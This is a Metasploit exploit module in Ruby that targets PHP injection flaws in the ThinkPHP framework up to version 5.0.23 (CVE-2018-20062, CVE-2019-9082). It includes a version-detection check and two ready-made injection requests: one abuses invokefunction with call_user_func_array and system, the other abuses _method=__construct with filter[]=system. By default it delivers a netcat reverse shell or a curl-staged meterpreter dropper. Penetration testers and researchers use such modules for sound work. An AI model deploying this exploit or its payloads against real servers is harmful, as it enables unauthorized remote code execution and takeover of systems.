class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
'Description' => %q{
This module exploits one of two PHP injection vulnerabilities in the
ThinkPHP web framework to execute code as the web user.
Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
vulnerable to a separate vulnerability. The module will automatically
attempt to detect the version of the software.
Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
},
'Author' => [
'wvu'
],
'References' => [
['CVE', '2018-20062'],
['CVE', '2019-9082'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
],
'DisclosureDate' => '2018-12-10',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
register_advanced_options([
OptFloat.new('CmdOutputTimeout',
[true, 'Timeout for cmd/unix/generic output', 3.5])
])
import_target_defaults
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => rand_text_alpha(8..42)}
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
return CheckCode::Unknown(
'Target did not respond with ThinkPHP copyright.'
)
end
version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text
unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
return CheckCode::Detected(
'Target did not respond with ThinkPHP version.'
)
end
@version = Gem::Version.new(version)
if @version <= Gem::Version.new('5.0.23')
return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
end
CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
end
def exploit
super
unless @version
fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
end
print_status("Targeting ThinkPHP #{@version} automatically")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
else
fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
if @version < Gem::Version.new('5.0.23')
exploit_less_than_5_0_23(cmd)
elsif @version == Gem::Version.new('5.0.23')
exploit_5_0_23(cmd)
else
fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
end
end
def exploit_less_than_5_0_23(cmd)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
's' => '/Index/\\think\\app/invokefunction',
'function' => 'call_user_func_array',
'vars[0]' => 'system',
'vars[1][]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
vprint_line(res.body[0, res.body.length / 2])
end
def exploit_5_0_23(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => 'captcha'},
'vars_post' => {
'_method' => '__construct',
'filter[]' => 'system',
'method' => 'get',
'server[REQUEST_METHOD]' => cmd
},
'partial' => true
}, datastore['CmdOutputTimeout'])
return unless res && res.code == 200
vprint_good("Successfully executed command: #{cmd}")
return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
end
end